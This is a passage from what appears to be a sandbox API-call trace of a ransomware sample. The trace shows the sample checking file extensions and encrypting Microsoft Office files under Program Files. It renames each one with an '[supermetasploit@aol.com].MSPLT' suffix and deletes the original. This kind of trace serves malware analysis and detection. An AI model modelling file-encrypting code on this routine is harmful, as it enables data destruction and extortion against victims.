lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.940] lstrlenW (lpString=".doc") returned 4 [0182.940] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString=".docx") returned 5 [0182.940] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.940] lstrlenW (lpString=".pdf") returned 4 [0182.940] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString=".xls") returned 4 [0182.940] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString=".xlsx") returned 5 [0182.940] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.940] lstrlenW (lpString=".ppt") returned 4 [0182.940] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.940] lstrlenW (lpString=".zip") returned 4 [0182.940] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.940] lstrlenW (lpString=".rar") returned 4 [0182.940] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.940] lstrlenW (lpString=".bz2") returned 4 [0182.940] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.941] lstrlenW (lpString=".7z") returned 3 [0182.941] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.941] lstrlenW (lpString=".dbf") returned 4 [0182.941] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.941] lstrlenW (lpString=".1cd") returned 4 [0182.941] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0182.941] lstrlenW (lpString=".jpg") returned 4 [0182.941] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.941] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0182.941] lstrlenW (lpString="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 53 [0182.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0182.942] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=399528) returned 1 [0182.942] CloseHandle (hObject=0x350) returned 1 [0182.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0182.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0182.942] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0182.942] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0182.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0182.943] GetLastError () returned 0x0 [0182.943] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x618a8, lpOverlapped=0x0) returned 1 [0182.955] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x618b0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x618b0, lpOverlapped=0x0) returned 1 [0183.528] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0183.528] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.528] SetEndOfFile (hFile=0x2fc) returned 1 [0183.528] CloseHandle (hObject=0x2fc) returned 1 [0183.542] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0183.542] SetEndOfFile (hFile=0x350) returned 1 [0183.547] CloseHandle (hObject=0x350) returned 1 [0183.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.547] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 1 [0183.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.548] lstrlenW (lpString=".doc") returned 4 [0183.548] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString=".docx") returned 5 [0183.548] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.548] lstrlenW (lpString=".pdf") returned 4 [0183.548] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString=".xls") returned 4 [0183.548] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString=".xlsx") returned 5 [0183.548] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.548] lstrlenW (lpString=".ppt") returned 4 [0183.548] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.548] lstrlenW (lpString=".zip") returned 4 [0183.548] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.548] lstrlenW (lpString=".rar") returned 4 [0183.548] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString=".bz2") returned 4 [0183.548] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString=".7z") returned 3 [0183.548] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.548] lstrlenW (lpString=".dbf") returned 4 [0183.548] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.548] lstrlenW (lpString=".1cd") returned 4 [0183.548] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.549] lstrlenW (lpString=".jpg") returned 4 [0183.549] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.549] lstrlenW (lpString=".doc") returned 4 [0183.549] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString=".docx") returned 5 [0183.549] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.549] lstrlenW (lpString=".pdf") returned 4 [0183.549] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString=".xls") returned 4 [0183.549] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString=".xlsx") returned 5 [0183.549] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.549] lstrlenW (lpString=".ppt") returned 4 [0183.549] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.549] lstrlenW (lpString=".zip") returned 4 [0183.549] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.549] lstrlenW (lpString=".rar") returned 4 [0183.549] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString=".bz2") returned 4 [0183.549] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.549] lstrlenW (lpString=".7z") returned 3 [0183.549] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.549] lstrlenW (lpString=".dbf") returned 4 [0183.549] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.550] lstrlenW (lpString=".1cd") returned 4 [0183.550] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0183.550] lstrlenW (lpString=".jpg") returned 4 [0183.550] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.550] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.550] lstrlenW (lpString="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 53 [0183.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0183.550] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=527958) returned 1 [0183.550] CloseHandle (hObject=0x350) returned 1 [0183.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 0x220 [0183.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0183.551] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0183.551] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0183.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0183.551] GetLastError () returned 0x0 [0183.551] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x80e56, lpOverlapped=0x0) returned 1 [0183.567] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x80e60, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x80e60, lpOverlapped=0x0) returned 1 [0184.013] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0184.013] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0184.013] SetEndOfFile (hFile=0x2fc) returned 1 [0184.014] CloseHandle (hObject=0x2fc) returned 1 [0184.033] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0184.033] SetEndOfFile (hFile=0x350) returned 1 [0184.381] CloseHandle (hObject=0x350) returned 1 [0184.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0184.381] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 1 [0184.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.382] lstrlenW (lpString=".doc") returned 4 [0184.382] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString=".docx") returned 5 [0184.382] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0184.382] lstrlenW (lpString=".pdf") returned 4 [0184.382] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString=".xls") returned 4 [0184.382] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString=".xlsx") returned 5 [0184.382] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0184.382] lstrlenW (lpString=".ppt") returned 4 [0184.382] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.382] lstrlenW (lpString=".zip") returned 4 [0184.382] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0184.382] lstrlenW (lpString=".rar") returned 4 [0184.382] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString=".bz2") returned 4 [0184.382] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString=".7z") returned 3 [0184.382] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0184.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.382] lstrlenW (lpString=".dbf") returned 4 [0184.382] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0184.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.382] lstrlenW (lpString=".1cd") returned 4 [0184.383] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.383] lstrlenW (lpString=".jpg") returned 4 [0184.383] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.383] lstrlenW (lpString=".doc") returned 4 [0184.383] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString=".docx") returned 5 [0184.383] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0184.383] lstrlenW (lpString=".pdf") returned 4 [0184.383] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString=".xls") returned 4 [0184.383] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString=".xlsx") returned 5 [0184.383] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0184.383] lstrlenW (lpString=".ppt") returned 4 [0184.383] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.383] lstrlenW (lpString=".zip") returned 4 [0184.383] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0184.383] lstrlenW (lpString=".rar") returned 4 [0184.383] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString=".bz2") returned 4 [0184.383] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0184.383] lstrlenW (lpString=".7z") returned 3 [0184.383] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0184.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.384] lstrlenW (lpString=".dbf") returned 4 [0184.384] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0184.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.384] lstrlenW (lpString=".1cd") returned 4 [0184.384] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0184.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0184.384] lstrlenW (lpString=".jpg") returned 4 [0184.384] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0184.384] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0184.384] lstrlenW (lpString="AG00038_.GIF") returned 12 [0184.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.380] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=3251) returned 1 [0185.380] CloseHandle (hObject=0x378) returned 1 [0185.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 0x220 [0185.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.381] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.381] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0185.382] GetLastError () returned 0x0 [0185.382] ReadFile (in: hFile=0x378, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xcb3, lpOverlapped=0x0) returned 1 [0185.386] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xcc0, lpOverlapped=0x0) returned 1 [0185.387] ReadFile (in: hFile=0x378, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0185.387] WriteFile (in: hFile=0x354, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0185.388] SetEndOfFile (hFile=0x354) returned 1 [0185.388] CloseHandle (hObject=0x354) returned 1 [0185.392] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0185.392] SetEndOfFile (hFile=0x378) returned 1 [0185.393] CloseHandle (hObject=0x378) returned 1 [0185.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.394] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0185.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.395] lstrlenW (lpString=".doc") returned 4 [0185.395] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.395] lstrlenW (lpString=".docx") returned 5 [0185.395] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.395] lstrlenW (lpString=".pdf") returned 4 [0185.395] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.395] lstrlenW (lpString=".xls") returned 4 [0185.395] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.395] lstrlenW (lpString=".xlsx") returned 5 [0185.395] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.395] lstrlenW (lpString=".ppt") returned 4 [0185.395] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0185.395] lstrlenW (lpString=".zip") returned 4 [0185.395] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.395] lstrlenW (lpString=".rar") returned 4 [0185.395] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.395] lstrlenW (lpString=".bz2") returned 4 [0185.395] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.395] lstrlenW 